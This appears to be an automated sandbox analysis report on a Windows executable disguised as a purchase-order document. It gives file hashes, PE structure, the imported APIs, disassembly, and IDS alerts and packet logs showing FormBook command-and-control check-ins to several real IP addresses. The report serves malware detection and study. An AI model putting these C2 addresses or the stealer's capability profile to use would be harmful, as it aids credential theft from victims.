....................................................

C:\Users\user\AppData\Local\Temp\turbinate

Download File

Process:	C:\Users\user\Desktop\PO-DOC1522025-12.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.992004316494122
Encrypted:	true
SSDEEP:	6144:wdtUn1o7WqxMYos+lD1W9SVIhWkthBbBLiOb0ZXW5AfC:wLUnq7W5L3juxbeC0ZXWaq
MD5:	3E64A135723ECC698A54CEEE6717E407
SHA1:	9F0DE74CD66047688EF11B154DD0C330270E3565
SHA-256:	B2B49C39984193362A73CC5784811F75CF77621157A9E582F0E0840D55872837
SHA-512:	01EAC3A2E593553515EA5CF193D6BE54BF9AE8EC569E1DD80D1678F83AACF916D14AD152AB9E06897B9D536AFDDB3360302FBA56FCD98B2A199DFDAF5B05B581
Malicious:	false
Reputation:	low
Preview:	.....NIL7...Q..f.NJ...f1P...PZRNIL7JN2XBJPPZRNIL7JN2XBJPPZ.NIL9U.<X.C.q.S..mc"'Ax28?7(3#i/V$ ],b(5p(' i%Yj.}.b'?4?\|CDF.JN2XBJP)[[.t,P.sR?.w07.H...).B..l:5.S.rR?..932o...7JN2XBJP..RN.M6J.Z..JPPZRNIL.JL3SCAPPJVNIL7JN2XB.EPZR^IL7jJ2XB.PPJRNIN7JH2XBJPPZTNIL7JN2XbNPPXRNIL7JL2..JP@ZR^IL7J^2XRJPPZRNYL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2v6/($ZRN.C3JN"XBJ@TZR^IL7JN2XBJPPZRNiL7N2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRN

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.436242670234977
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO-DOC1522025-12.exe
File size:	1'645'568 bytes
MD5:	dc2314bb7a5383eb616a78e1f43d4472
SHA1:	99cdff011d26e805ce19f8d84c5538181d02db0f
SHA256:	d26aea201415a8250f0ef469e579d33056696b102a6ca42ead5a838a29b15ba4
SHA512:	214258fbe9fbb97b00e34a70ce3ba6b4cec740c106792774790bc1b461bd91a8f7cc758e6a9ba0871372394ca7e9e1699f5bc597a69f3c24f328c9d746883bd3
SSDEEP:	24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8aw89/o+eZv7Ktues+y57d8OfD:KTvC/MTQYxsWR7aw89/o156
TLSH:	F675E10273D1C022FFAB96734B5AF6115BBC79260523A61F03A81DB9BD701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6786F31A [Tue Jan 14 23:28:26 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F8E00C20003h
jmp 00007F8E00C1F90Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8E00C1FAEDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8E00C1FABAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F8E00C226ADh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F8E00C226F8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F8E00C226E1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xbb094	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x190000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xbb094	0xbb200	1d1bda3f97f1a1e68f94a61a3e9e88b8	False	0.9648881095524382	data	7.96506205522469	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x190000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xb235c	data			1.0003164608985846
RT_GROUP_ICON	0x18eb14	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x18eb8c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x18eba0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x18ebb4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x18ebc8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x18eca4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T08:28:32.233926+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49864	154.215.72.110	80	TCP
2025-01-15T08:29:04.255471+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49904	116.50.37.244	80	TCP
2025-01-15T08:30:30.972757+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49910	85.159.66.93	80	TCP
2025-01-15T08:30:44.635383+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49916	91.195.240.94	80	TCP
2025-01-15T08:31:06.171460+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49920	66.29.149.46	80	TCP
2025-01-15T08:31:19.801583+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49924	195.110.124.133	80	TCP
2025-01-15T08:31:49.267638+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49929	217.196.55.202	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 08:28:31.328476906 CET	49864	80	192.168.2.6	154.215.72.110
Jan 15, 2025 08:28:31.333431005 CET	80	49864	154.215.72.110	192.168.2.6
Jan 15, 2025 08:28:31.333528996 CET	49864	80	192.168.2.6	154.215.72.110
Jan 15, 2025 08:28:31.336708069 CET	49864	80	192.168.2.6	154.215.72.110
Jan 15, 2025 08:28:31.341540098 CET	80	49864	154.215.72.110	192.168.2.6
Jan 15, 2025 08:28:32.233675003 CET	80	49864	154.215.72.110	192.168.2.6
Jan 15, 2025 08:28:32.233706951 CET	80	49864	154.215.72.110	192.168.2.6
Jan 15, 2025 08:28:32.233926058 CET	49864	80	192.168.2.6	154.215.72.110
Jan 15, 2025 08:28:32.237561941 CET	49864	80	192.168.2.6	154.215.72.110
Jan 15, 2025 08:28:32.242440939 CET	80	49864	154.215.72.110	192.168.2.6
Jan 15, 2025 08:28:55.764158010 CET	49901	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:55.768939972 CET	80	49901	116.50.37.244	192.168.2.6
Jan 15, 2025 08:28:55.769026995 CET	49901	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:55.770737886 CET	49901	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:55.775566101 CET	80	49901	116.50.37.244	192.168.2.6
Jan 15, 2025 08:28:56.643721104 CET	80	49901	116.50.37.244	192.168.2.6
Jan 15, 2025 08:28:56.643753052 CET	80	49901	116.50.37.244	192.168.2.6
Jan 15, 2025 08:28:56.643940926 CET	49901	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:57.271843910 CET	49901	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:58.290234089 CET	49902	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:58.295403004 CET	80	49902	116.50.37.244	192.168.2.6
Jan 15, 2025 08:28:58.295532942 CET	49902	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:58.297305107 CET	49902	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:58.302144051 CET	80	49902	116.50.37.244	192.168.2.6
Jan 15, 2025 08:28:59.185817003 CET	80	49902	116.50.37.244	192.168.2.6
Jan 15, 2025 08:28:59.185879946 CET	80	49902	116.50.37.244	192.168.2.6
Jan 15, 2025 08:28:59.185982943 CET	49902	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:28:59.803208113 CET	49902	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:00.832079887 CET	49903	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:00.837243080 CET	80	49903	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:00.837414026 CET	49903	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:00.839031935 CET	49903	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:00.843949080 CET	80	49903	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:00.843991041 CET	80	49903	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:01.717227936 CET	80	49903	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:01.717381954 CET	80	49903	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:01.717508078 CET	49903	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:02.350244045 CET	49903	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:03.368438005 CET	49904	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:03.373578072 CET	80	49904	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:03.373718977 CET	49904	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:03.375433922 CET	49904	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:03.380285978 CET	80	49904	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:04.255281925 CET	80	49904	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:04.255352020 CET	80	49904	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:04.255470991 CET	49904	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:04.259481907 CET	49904	80	192.168.2.6	116.50.37.244
Jan 15, 2025 08:29:04.264288902 CET	80	49904	116.50.37.244	192.168.2.6
Jan 15, 2025 08:29:22.655019999 CET	49907	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:22.659879923 CET	80	49907	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:22.660012960 CET	49907	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:22.661767006 CET	49907	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:22.666555882 CET	80	49907	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:24.178133965 CET	49907	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:24.189352036 CET	80	49907	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:24.189416885 CET	49907	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:25.197326899 CET	49908	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:25.202347994 CET	80	49908	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:25.202586889 CET	49908	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:25.204530001 CET	49908	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:25.209389925 CET	80	49908	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:26.709393024 CET	49908	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:26.714637041 CET	80	49908	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:26.714802027 CET	49908	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:27.728406906 CET	49909	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:27.733357906 CET	80	49909	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:27.733428955 CET	49909	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:27.735284090 CET	49909	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:27.740075111 CET	80	49909	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:27.740215063 CET	80	49909	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:29.240809917 CET	49909	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:29.246357918 CET	80	49909	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:29.246500969 CET	49909	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:30.258713961 CET	49910	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:30.264136076 CET	80	49910	85.159.66.93	192.168.2.6
Jan 15, 2025 08:29:30.264224052 CET	49910	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:29:30.265819073 CET	49910	80	192.168.2.6	85.159.66.93
